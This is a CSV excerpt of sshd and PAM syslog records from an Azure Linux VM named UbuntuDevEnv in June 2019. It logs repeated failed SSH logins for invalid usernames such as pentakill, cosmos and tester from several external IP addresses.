+11106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:02,UbuntuDevEnv,2019-06-26 00:06:01,auth,UbuntuDevEnv,info,"Received disconnect from 81.12.159.146 port 58572:11: Normal Shutdown, Thank you for playing [preauth]",67694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.12.159.1,58572,,
+11107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:04,UbuntuDevEnv,2019-06-26 00:06:04,auth,UbuntuDevEnv,info,Invalid user pentakill from 131.100.219.3 port 59474,67710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentakill,131.100.219.3,59474,,
+11108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:04,UbuntuDevEnv,2019-06-26 00:06:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:04,UbuntuDevEnv,2019-06-26 00:06:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,67710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:06,UbuntuDevEnv,2019-06-26 00:06:06,auth,UbuntuDevEnv,info,Failed password for invalid user pentakill from 131.100.219.3 port 59474 ssh2,67710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentakill,131.100.219.3,59474,,
+11111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:07,UbuntuDevEnv,2019-06-26 00:06:06,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 59474:11: Bye Bye [preauth],67710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,59474,,
+11112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:07,UbuntuDevEnv,2019-06-26 00:06:06,auth,UbuntuDevEnv,info,Disconnected from invalid user pentakill 131.100.219.3 port 59474 [preauth],67710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentakill,131.100.219.3,59474,,
+11113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:19,UbuntuDevEnv,2019-06-26 00:06:19,auth,UbuntuDevEnv,info,Invalid user cosmos from 104.248.121.67 port 41039,67770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cosmos,104.248.121.6,41039,,
+11114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:19,UbuntuDevEnv,2019-06-26 00:06:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,67770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:19,UbuntuDevEnv,2019-06-26 00:06:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:21,UbuntuDevEnv,2019-06-26 00:06:21,auth,UbuntuDevEnv,info,Failed password for invalid user cosmos from 104.248.121.67 port 41039 ssh2,67770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cosmos,104.248.121.6,41039,,
+11117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:22,UbuntuDevEnv,2019-06-26 00:06:21,auth,UbuntuDevEnv,info,Disconnected from invalid user cosmos 104.248.121.67 port 41039 [preauth],67770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cosmos,104.248.121.6,41039,,
+11118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:22,UbuntuDevEnv,2019-06-26 00:06:21,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 41039:11: Bye Bye [preauth],67770,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,41039,,
+11119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:33,UbuntuDevEnv,2019-06-26 00:06:33,auth,UbuntuDevEnv,info,Invalid user qe from 114.112.81.180 port 41436,67817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qe,114.112.81.1,41436,,
+11120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:33,UbuntuDevEnv,2019-06-26 00:06:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,67817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+11121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:33,UbuntuDevEnv,2019-06-26 00:06:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:35,UbuntuDevEnv,2019-06-26 00:06:34,auth,UbuntuDevEnv,info,Failed password for invalid user qe from 114.112.81.180 port 41436 ssh2,67817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qe,114.112.81.1,41436,,
+11123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:35,UbuntuDevEnv,2019-06-26 00:06:35,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 41436:11: Bye Bye [preauth],67817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,41436,,
+11124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:35,UbuntuDevEnv,2019-06-26 00:06:35,auth,UbuntuDevEnv,info,Disconnected from invalid user qe 114.112.81.180 port 41436 [preauth],67817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qe,114.112.81.1,41436,,
+11125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:40,UbuntuDevEnv,2019-06-26 00:06:39,auth,UbuntuDevEnv,info,Invalid user ts from 88.247.110.88 port 31613,67843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts,88.247.110.8,31613,,
+11126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:40,UbuntuDevEnv,2019-06-26 00:06:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,67843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:40,UbuntuDevEnv,2019-06-26 00:06:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:41,UbuntuDevEnv,2019-06-26 00:06:41,auth,UbuntuDevEnv,info,Failed password for invalid user ts from 88.247.110.88 port 31613 ssh2,67843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts,88.247.110.8,31613,,
+11129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:41,UbuntuDevEnv,2019-06-26 00:06:41,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 31613:11: Bye Bye [preauth],67843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,31613,,
+11130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:06:41,UbuntuDevEnv,2019-06-26 00:06:41,auth,UbuntuDevEnv,info,Disconnected from invalid user ts 88.247.110.88 port 31613 [preauth],67843,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts,88.247.110.8,31613,,
+11131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:07:05,UbuntuDevEnv,2019-06-26 00:07:04,auth,UbuntuDevEnv,info,Invalid user ftpusr from 196.27.127.61 port 41011,67930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpusr,196.27.127.6,41011,,
+11132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:07:05,UbuntuDevEnv,2019-06-26 00:07:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,67930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+11133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:07:05,UbuntuDevEnv,2019-06-26 00:07:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:07:07,UbuntuDevEnv,2019-06-26 00:07:06,auth,UbuntuDevEnv,info,Failed password for invalid user ftpusr from 196.27.127.61 port 41011 ssh2,67930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpusr,196.27.127.6,41011,,
+11135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:07:07,UbuntuDevEnv,2019-06-26 00:07:06,auth,UbuntuDevEnv,info,Disconnected from invalid user ftpusr 196.27.127.61 port 41011 [preauth],67930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpusr,196.27.127.6,41011,,
+11136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:07:07,UbuntuDevEnv,2019-06-26 00:07:06,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 41011:11: Bye Bye [preauth],67930,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,41011,,
+11137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:07:17,UbuntuDevEnv,2019-06-26 00:07:16,auth,UbuntuDevEnv,info,Invalid user eden from 118.222.146.186 port 45716,67971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eden,118.222.146.1,45716,,
+11138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:07:17,UbuntuDevEnv,2019-06-26 00:07:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,67971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+11139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:07:17,UbuntuDevEnv,2019-06-26 00:07:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,67971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:07:18,UbuntuDevEnv,2019-06-26 00:07:18,auth,UbuntuDevEnv,info,Failed password for invalid user eden from 118.222.146.186 port 45716 ssh2,67971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eden,118.222.146.1,45716,,
+11141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:07:19,UbuntuDevEnv,2019-06-26 00:07:18,auth,UbuntuDevEnv,info,Disconnected from invalid user eden 118.222.146.186 port 45716 [preauth],67971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eden,118.222.146.1,45716,,
+11142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:07:19,UbuntuDevEnv,2019-06-26 00:07:18,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 45716:11: Bye Bye [preauth],67971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,45716,,
+11143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:11,UbuntuDevEnv,2019-06-26 00:08:10,auth,UbuntuDevEnv,info,Invalid user tester from 104.248.121.67 port 49877,68171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tester,104.248.121.6,49877,,
+11144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:11,UbuntuDevEnv,2019-06-26 00:08:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.121.67,68171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.248.121.6,,0,
+11145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:11,UbuntuDevEnv,2019-06-26 00:08:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:13,UbuntuDevEnv,2019-06-26 00:08:12,auth,UbuntuDevEnv,info,Failed password for invalid user tester from 104.248.121.67 port 49877 ssh2,68171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tester,104.248.121.6,49877,,
+11147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:13,UbuntuDevEnv,2019-06-26 00:08:12,auth,UbuntuDevEnv,info,Disconnected from invalid user tester 104.248.121.67 port 49877 [preauth],68171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tester,104.248.121.6,49877,,
+11148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:13,UbuntuDevEnv,2019-06-26 00:08:12,auth,UbuntuDevEnv,info,Received disconnect from 104.248.121.67 port 49877:11: Bye Bye [preauth],68171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.121.6,49877,,
+11149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:20,UbuntuDevEnv,2019-06-26 00:08:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68199,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:20,UbuntuDevEnv,2019-06-26 00:08:20,auth,UbuntuDevEnv,info,Invalid user pentecote from 131.100.219.3 port 47646,68199,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentecote,131.100.219.3,47646,,
+11151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:20,UbuntuDevEnv,2019-06-26 00:08:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,68199,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+11152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:23,UbuntuDevEnv,2019-06-26 00:08:22,auth,UbuntuDevEnv,info,Failed password for invalid user pentecote from 131.100.219.3 port 47646 ssh2,68199,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentecote,131.100.219.3,47646,,
+11153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:23,UbuntuDevEnv,2019-06-26 00:08:22,auth,UbuntuDevEnv,info,Invalid user qun from 88.247.110.88 port 47259,68219,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qun,88.247.110.8,47259,,
+11154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:23,UbuntuDevEnv,2019-06-26 00:08:22,auth,UbuntuDevEnv,info,Invalid user pradeep from 114.112.81.180 port 60538,68215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pradeep,114.112.81.1,60538,,
+11155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:23,UbuntuDevEnv,2019-06-26 00:08:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:23,UbuntuDevEnv,2019-06-26 00:08:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68219,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+11157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:23,UbuntuDevEnv,2019-06-26 00:08:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,68219,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+11158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:23,UbuntuDevEnv,2019-06-26 00:08:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,68215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+11159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:23,UbuntuDevEnv,2019-06-26 00:08:22,auth,UbuntuDevEnv,info,Disconnected from invalid user pentecote 131.100.219.3 port 47646 [preauth],68199,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pentecote,131.100.219.3,47646,,
+11160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:23,UbuntuDevEnv,2019-06-26 00:08:22,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 47646:11: Bye Bye [preauth],68199,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,47646,,
+11161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:25,UbuntuDevEnv,2019-06-26 00:08:24,auth,UbuntuDevEnv,info,Failed password for invalid user pradeep from 114.112.81.180 port 60538 ssh2,68215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pradeep,114.112.81.1,60538,,
+11162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:25,UbuntuDevEnv,2019-06-26 00:08:24,auth,UbuntuDevEnv,info,Failed password for invalid user qun from 88.247.110.88 port 47259 ssh2,68219,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qun,88.247.110.8,47259,,
+11163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:25,UbuntuDevEnv,2019-06-26 00:08:24,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 47259:11: Bye Bye [preauth],68219,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,47259,,
+11164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:25,UbuntuDevEnv,2019-06-26 00:08:24,auth,UbuntuDevEnv,info,Disconnected from invalid user qun 88.247.110.88 port 47259 [preauth],68219,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qun,88.247.110.8,47259,,
+11165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:08:25,UbuntuDevEnv,2019-06-26 00:08:24,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 60538:11: Bye Bye [preauth],68215,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,60538,,
